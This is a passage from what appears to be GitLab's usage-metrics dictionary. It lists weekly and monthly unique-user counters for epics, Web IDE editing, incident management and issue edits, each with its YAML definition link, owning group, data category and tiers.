+Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium` + +### `redis_hll_counters.epics_usage.g_project_management_users_removing_epic_emoji_monthly` + +Counts of MAU removing emoji on epic + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210505071850_g_project_management_users_removing_epic_emoji_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_removing_epic_emoji_weekly` + +Counts of WAU removing emoji on epic + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210505071932_g_project_management_users_removing_epic_emoji_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_setting_epic_confidential_monthly` + +Count of MAU making epics confidential + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210310203049_g_project_management_epic_confidential_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_setting_epic_confidential_weekly` + +Count of WAU making epics confidential + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210310203225_g_project_management_epic_confidential_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_setting_epic_due_date_as_fixed_monthly` + +Counts of MAU setting epic due date as inherited + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210325060507_g_project_management_users_setting_epic_due_date_as_fixed_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_setting_epic_due_date_as_fixed_weekly` + +Counts of WAU setting epic due date as fixed + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210325060623_g_project_management_users_setting_epic_due_date_as_fixed_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_setting_epic_due_date_as_inherited_monthly` + +Counts of MAU setting epic due date as inherited + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210325060315_g_project_management_users_setting_epic_due_date_as_inherited_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_setting_epic_due_date_as_inherited_weekly` + +Counts of WAU setting epic due date as inherited + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210325060903_g_project_management_users_setting_epic_due_date_as_inherited_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_setting_epic_start_date_as_fixed_monthly` + +Counts of MAU setting epic start date as fixed + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210315055624_g_project_management_users_setting_epic_start_date_as_fixed_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_setting_epic_start_date_as_fixed_weekly` + +Counts of WAU setting epic start date as fixed + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210315054905_g_project_management_users_setting_epic_start_date_as_fixed_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_setting_epic_start_date_as_inherited_monthly` + +Counts of MAU setting epic start date as inherited + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210315055439_g_project_management_users_setting_epic_start_date_as_inherited_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_setting_epic_start_date_as_inherited_weekly` + +Counts of WAU setting epic start date as inherited + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210315055342_g_project_management_users_setting_epic_start_date_as_inherited_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_setting_epic_visible_monthly` + +Count of MAU making epics visible + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210312093611_g_project_management_epic_visible_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_setting_epic_visible_weekly` + +Count of WAU making epics visible + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210312093243_g_poject_management_epic_visible_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_updating_epic_descriptions_monthly` + +Counts of MAU changing epic descriptions + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210312102051_g_project_management_users_updating_epic_descriptions_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_updating_epic_descriptions_weekly` + +Counts of WAU changing epic descriptions + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210312101753_g_project_management_users_updating_epic_descriptions_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_updating_epic_notes_monthly` + +Counts of MAU updating epic notes + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210314234202_g_project_management_users_updating_epic_notes_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_updating_epic_notes_weekly` + +Counts of WAU updating epic notes + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210314234041_g_project_management_users_updating_epic_notes_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_updating_epic_parent_monthly` + +Counts of MAU updating parent on epic + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210423011841_g_project_management_users_updating_epic_parent_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_updating_epic_parent_weekly` + +Counts of WAU updating parent on epic + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210423012053_g_project_management_users_updating_epic_parent_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_updating_epic_titles_monthly` + +Counts of MAU changing epic titles + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210312101935_g_project_management_users_updating_epic_titles_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_updating_epic_titles_weekly` + +Counts of WAU changing epic titles + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210312101826_g_project_management_users_updating_epic_titles_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_updating_fixed_epic_due_date_monthly` + +Counts of MAU manually updating fixed due date + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210329043548_g_project_management_users_updating_fixed_epic_due_date_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_updating_fixed_epic_due_date_weekly` + +Counts of WAU manually updating fixed due date + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210329042536_g_project_management_users_updating_fixed_epic_due_date_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_updating_fixed_epic_start_date_monthly` + +Counts of MAU manually updating fixed start date + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210329043509_g_project_management_users_updating_fixed_epic_start_date_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.g_project_management_users_updating_fixed_epic_start_date_weekly` + +Counts of WAU manually updating fixed start date + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210329043402_g_project_management_users_updating_fixed_epic_start_date_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.project_management_users_checking_epic_task_monthly` + +Counts of MAU checking epic task + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210421080207_g_project_management_users_checking_epic_task_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.project_management_users_checking_epic_task_weekly` + +Counts of WAU checking epic task + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210421075943_g_project_management_users_checking_epic_task_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.project_management_users_unchecking_epic_task_monthly` + +Counts of MAU unchecking epic task + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210421102516_g_project_management_users_unchecking_epic_task_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.epics_usage.project_management_users_unchecking_epic_task_weekly` + +Counts of WAU unchecking epic task + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210421102812_g_project_management_users_unchecking_epic_task_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.ide_edit.g_edit_by_sfe_monthly` + +Number of users editing a file from the single file editor + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180334_g_edit_by_sfe_monthly.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ide_edit.g_edit_by_sfe_weekly` + +Weekly number of users editing from the single file editor + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180332_g_edit_by_sfe_weekly.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ide_edit.g_edit_by_snippet_ide_monthly` + +Count of monthly edits to a snippet + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180338_g_edit_by_snippet_ide_monthly.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ide_edit.g_edit_by_snippet_ide_weekly` + +Weekly number of users editing Snippets + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180336_g_edit_by_snippet_ide_weekly.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ide_edit.g_edit_by_sse_monthly` + +Number of user editing files using the Static Site Editor + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184024_g_edit_by_sse_monthly.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ide_edit.g_edit_by_sse_weekly` + +Weekly number of users editing using the Static Site Editor + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184022_g_edit_by_sse_weekly.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ide_edit.g_edit_by_web_ide_monthly` + +Number of users editing a file from the Web IDE + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180330_g_edit_by_web_ide_monthly.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ide_edit.g_edit_by_web_ide_weekly` + +Weekly number of users editing using the Web IDE + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180328_g_edit_by_web_ide_weekly.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ide_edit.ide_edit_total_unique_counts_monthly` + +Count of unique users per month who edited a file from the Web IDE + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180341_ide_edit_total_unique_counts_monthly.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ide_edit.ide_edit_total_unique_counts_weekly` + +Weekly number of users editing a file using the Web IDE + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180339_ide_edit_total_unique_counts_weekly.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_alert_assigned_monthly` + +Count of unique users assigning an alert per month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180533_incident_management_alert_assigned_monthly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_alert_assigned_weekly` + +Count of unique users assigning an alert per week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180532_incident_management_alert_assigned_weekly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_alert_status_changed_monthly` + +Count of unique users changing alert's status changes per month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180530_incident_management_alert_status_changed_monthly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_alert_status_changed_weekly` + +Count of unique users changing alert's status per week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180528_incident_management_alert_status_changed_weekly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_alert_todo_monthly` + +Count of unique users adding alerts to the TODO list per month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180537_incident_management_alert_todo_monthly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_alert_todo_weekly` + +Count of unique users adding alerts to the TODO list per week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180535_incident_management_alert_todo_weekly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_assigned_monthly` + +Count of users assigning incidents per month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180552_incident_management_incident_assigned_monthly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_assigned_weekly` + +Count of unique users assiging incidents per week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180550_incident_management_incident_assigned_weekly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_change_confidential_monthly` + +Count of users changing incidents to confidential per month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180618_incident_management_incident_change_confidential_monthly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_change_confidential_weekly` + +Count of unique users changing incidents to confidential per week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180616_incident_management_incident_change_confidential_weekly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_closed_monthly` + +Count of users closing incidents per month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180548_incident_management_incident_closed_monthly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_closed_weekly` + +Count of users closing incidents per week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180546_incident_management_incident_closed_weekly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_comment_monthly` + +Count of unique users adding comments per month on incidents + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180559_incident_management_incident_comment_monthly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_comment_weekly` + +Count of unique users adding comments on incidents per week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180558_incident_management_incident_comment_weekly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_created_monthly` + +Count of unique users creating incidents per month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180541_incident_management_incident_created_monthly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_created_weekly` + +Count of unique users creating incidents per week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180539_incident_management_incident_created_weekly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_published_monthly` + +Count of unique users that published incidents per month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216180607_incident_management_incident_published_monthly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_published_weekly` + +Count of unique users that published incidents per week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216180605_incident_management_incident_published_weekly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_relate_monthly` + +Count of unique users adding issues per month that are related to an incident + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180611_incident_management_incident_relate_monthly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_relate_weekly` + +Count of unique users adding issues per that are related to an incident week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180609_incident_management_incident_relate_weekly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_reopened_monthly` + +Count of unique users reopening incidents per month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180545_incident_management_incident_reopened_monthly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_reopened_weekly` + +Count of unique users reopening incidents per week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180543_incident_management_incident_reopened_weekly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_todo_monthly` + +Count of unique users adding incidents to the TODO list per month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180556_incident_management_incident_todo_monthly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_todo_weekly` + +Count of unique users adding incidents to the TODO list per week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180554_incident_management_incident_todo_weekly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_unrelate_monthly` + +Count of users removing issues that are related to an incident per month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180614_incident_management_incident_unrelate_monthly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_unrelate_weekly` + +Count of unique users removing issue that are related to an incident per week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180612_incident_management_incident_unrelate_weekly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_zoom_meeting_monthly` + +Count of users creating Zoom meetings about incidents per month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180603_incident_management_incident_zoom_meeting_monthly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_incident_zoom_meeting_weekly` + +Count of unique users creating Zoom meetings about incidents per week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180601_incident_management_incident_zoom_meeting_weekly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_total_unique_counts_monthly` + +Count of unique users performing events related with incidents per month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180622_incident_management_total_unique_counts_monthly.yml) + +Group: `group::monitor` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management.incident_management_total_unique_counts_weekly` + +Count of unique users performing events related to the incident management + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180620_incident_management_total_unique_counts_weekly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management_alerts.incident_management_alert_create_incident_monthly` + +Count of unique users per month to create an incident corresponding to an alert + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180625_incident_management_alert_create_incident_monthly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management_alerts.incident_management_alert_create_incident_weekly` + +Count of unique users per week to create an incident corresponding to an alert + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180623_incident_management_alert_create_incident_weekly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.incident_management_oncall.i_incident_management_oncall_notification_sent_monthly` + +Count of unique users to receive a notification while on-call + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210405222005_i_incident_management_oncall_notification_sent_monthly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.incident_management_oncall.i_incident_management_oncall_notification_sent_weekly` + +Count of unique users to receive a notification while on-call + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210405220139_i_incident_management_oncall_notification_sent_weekly.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_added_to_epic_monthly` + +Count of MAU adding an issue to an epic + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181414_g_project_management_issue_added_to_epic_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_added_to_epic_weekly` + +Count of WAU adding an issue to an epic + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216181413_g_project_management_issue_added_to_epic_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_assignee_changed_monthly` + +Count of MAU changing issue assignees + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181311_g_project_management_issue_assignee_changed_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_assignee_changed_weekly` + +Count of WAU changing issue assignees + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181310_g_project_management_issue_assignee_changed_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_changed_epic_monthly` + +Count of MAU changing the epic on an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181420_g_project_management_issue_changed_epic_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_changed_epic_weekly` + +Count of WAU changing the epic on an issue + +[YAML 